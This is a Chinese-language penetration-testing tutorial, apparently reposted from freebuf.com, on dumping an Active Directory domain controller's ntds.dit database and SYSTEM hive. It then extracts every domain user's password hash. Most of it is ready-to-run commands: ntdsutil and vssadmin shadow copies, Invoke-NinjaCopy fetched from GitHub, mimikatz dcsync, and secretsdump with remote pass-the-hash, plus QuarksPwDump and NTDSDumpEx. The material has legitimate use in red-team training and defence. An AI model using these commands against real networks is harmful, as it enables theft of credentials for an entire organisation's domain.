ntds.dit
ntds.dit为ad的数据库(C:\Windows\NTDS),内容有域用户、域组、用户hash等信息,域控上的ntds.dit只有可以登录到域控的用户(如域管用户、DC本地管理员用户)可以访问。ntds.dit包括三个主要表:数据表、链接表、sd表。所以只要在域渗透中能够获取到ntds.dit就可以获取到所有域用户的用户名和对应的hash,ntds.dit是加密的,需要获取system来解密。查看dit数据库可使用https://github.com/yosqueoy/ditsnap工具。
离线获取ntds.dit
vss快照方式
vss即Volume Shadow Copy Service。win2003及以上有,用于创建数据备份的快照功能。
ntdsutil
查看当前快照列表和已经挂载的快照
ntdsutil snapshot "List All" quit quit
ntdsutil snapshot "List Mounted" quit quit
创建快照
ntdsutil snapshot "activate instance ntds" create quit quit
挂载快照
ntdsutil snapshot "mount 521972bf-3b80-470c-aa9b-f40ee0f9be57" quit quit
复制出来ntds和system
copy C:\$SNAP_202009131458_VOLUMEC$\windows\NTDS\ntds.dit c:\ntds.dit
copy C:\$SNAP_202009131458_VOLUMEC$\windows\system32\config\SYSTEM c:\SYSTEM
卸载和删除快照
ntdsutil snapshot "unmount {521972bf-3b80-470c-aa9b-f40ee0f9be57}" quit quit
ntdsutil snapshot "delete {521972bf-3b80-470c-aa9b-f40ee0f9be57}" quit quit
vssadmin
查看快照
vssadmin list shadows
创建快照
vssadmin create shadow /for=c:
复制出来ntds和system
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\windows\NTDS\ntds.dit c:\ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\windows\system32\config\SYSTEM C:\SYSTEM
删除快照
vssadmin delete shadows /for=c: /quiet
PS:直接是无法访问\?\快照中的内容的,需要创建链接才可以:mklink /d c:\vssfile \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\
nishang:copy-vss.ps1
nishang的Copy-VSS.ps1可进行快捷的
开启ps执行脚本权限:
Set-ExecutionPolicy Unrestricted
copy到当前目录:
Copy-VSS
msf:psexec_ntdsgrab
msf模块psexec_ntdsgrab可利用vss导出,再离线破解。
admin/smb/psexec_ntdsgrab
NinjaCopy方式
在powersploit中提供了不调用vss的方式ninjacopy。ps文件下载地址:https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-NinjaCopy.ps1
开启ps执行脚本权限:
Set-ExecutionPolicy Unrestricted
导入ps模块并导出ntds:
Import-Module .\invoke-NinjaCopy.ps1
Invoke-NinjaCopy -Path C:\Windows\System32\config\SYSTEM -LocalDestination C:\\system
Invoke-NinjaCopy -Path "C:\windows\ntds\ntds.dit" -LocalDestination "C:\\ntds.dit"
ntds.dit中提取hash
mimikatz
在服务器直接mimikatz即可,就不用上面的离线导出ntds.dit了,有杀毒软件等情况还是需要离线导出。
lsadump::dcsync /domain:fox.com /all /csv
secretsdump.py
Impacket包中的py:
secretsdump.py -ntds ./ntds.dit -system ./SYSTEM LOCAL
得到域管用户密码或hash情况下,可远程连接导出:
secretsdump.py fox/admintests:[email protected]
或者
secretsdump.py fox/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:621cdf4b49c06ec28caa7a6cab4ebac8
QuarksPwDump.exe
先使用windows自带的esentutl修复下ntds.dit文件:
esentutl /p /o ntds.dit
再使用QuarksPwDump.exe进行提取
.\QuarksPwDump.exe --dump-hash-domain --output userhash.txt --ntds-file .\ntds.dit
NTDSDumpEx
相当windows的secretsdump,下载地址:https://github.com/zcgonvh/NTDSDumpEx
.\NTDSDumpEx.exe -d ntds.dit -s SYSTEM
PS:搭建域环境时候随便敲的域名为fox.com,与其他无关。
来源:freebuf.com 2020-11-26 16:28:26 by: SecIN技术社区
请登录后发表评论
注册